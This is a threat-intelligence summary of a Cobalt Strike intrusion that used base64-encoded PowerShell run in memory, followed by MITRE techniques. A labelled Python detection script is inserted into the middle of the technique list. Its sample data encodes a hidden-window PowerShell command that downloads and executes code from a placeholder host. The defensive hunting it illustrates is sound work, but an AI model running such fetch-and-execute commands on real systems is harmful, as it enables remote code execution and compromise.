Cobalt Strike has been leveraged in an attack to execute obfuscated PowerShell scripts that run in memory to evade detection. The analysis highlights the importance of Windows Event Logs for identifying this activity. Despite the effort needed to decode the payloads, key indicators of compromise were identified. Affected: Windows systems, PowerShell, Cobalt Strike users
Keypoints:
- Cobalt Strike is a versatile tool used in cyber attacks, utilizing multiple techniques for execution.
- The exploitation involved PowerShell scripts that were obfuscated using base64 encoding.
- Key logs for investigation include the Windows PowerShell Event Log filtered by Event ID 4104.
- Dynamic analysis revealed the use of .NET in the payload execution process.
- Indicators of Compromise (IOCs) were extracted from both the static and dynamic analysis of the malware.
MITRE Techniques:
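An added detection example in Python, not code from the article: it applies the keypoint about hunting Event ID 4104 script-block records, decoding base64 -EncodedCommand arguments (UTF-16LE, as PowerShell expects) and flagging the .NET download and in-memory execution primitives the payload relied on. The record shape, the sample events and the keyword list are assumptions.

```python
import base64
import re

# Constructed sample records in the shape of Event ID 4104 script-block entries
# (Microsoft-Windows-PowerShell/Operational); these are not from the article.
SAMPLE_EVENTS = [
    {"EventID": 4104, "ScriptBlockText": "Get-ChildItem C:\\Users | Format-Table"},
    {"EventID": 4104, "ScriptBlockText": "powershell -nop -w hidden -enc " + base64.b64encode(
        "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')"
        .encode("utf-16-le")).decode()},
    {"EventID": 4103, "ScriptBlockText": "Write-Host hello"},  # other event ID, ignored
]

# -e / -ec / -enc / -EncodedCommand followed by a base64 blob (assumed minimum length 20)
ENCODED_ARG = re.compile(r"-e(?:ncodedcommand|nc|c)?\s+([A-Za-z0-9+/=]{20,})", re.IGNORECASE)

# Assumed indicator keywords: in-memory execution and .NET download/reflection primitives
SUSPICIOUS = ("IEX", "Invoke-Expression", "DownloadString", "FromBase64String",
              "Reflection.Assembly", "New-Object Net.WebClient")


def decode_encoded_command(b64: str):
    """Decode a PowerShell -EncodedCommand argument (base64 of UTF-16LE text)."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze_event(event: dict) -> dict:
    """Decode any encoded arguments in one record and collect indicator hits."""
    text = event.get("ScriptBlockText", "")
    decoded = [d for d in (decode_encoded_command(m.group(1))
                           for m in ENCODED_ARG.finditer(text)) if d]
    haystack = (text + "\n" + "\n".join(decoded)).lower()
    hits = sorted(k for k in SUSPICIOUS if k.lower() in haystack)
    return {"event_id": event.get("EventID"), "decoded": decoded,
            "indicators": hits, "suspicious": bool(decoded or hits)}


def hunt(events) -> list:
    """Return analysis results for the 4104 records that look suspicious."""
    return [r for r in (analyze_event(e) for e in events if e.get("EventID") == 4104)
            if r["suspicious"]]


if __name__ == "__main__":
    for r in hunt(SAMPLE_EVENTS):
        print(r["event_id"], r["indicators"], r["decoded"])
```

On a real host the same logic applies to records exported from the Microsoft-Windows-PowerShell/Operational channel, where the decoded text is what the analyst reads instead of the base64 blob.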
- Execution (T1059): PowerShell scripts executed through the PowerShell interpreter.
- Obfuscated Files or Information (T1027): Use of base64 encoding to conceal script content.
- Command and Control (C2) (T1071): External C2 calls made by the payload executed in memory.
- Process Injection (T1055): Execution of the payload through memory to avoid detection.
Indicators of Compromise:
Full Story: https://medium.com/@psyrensics/cobalt-strike-45ae9ab79697?source=rss——malware-5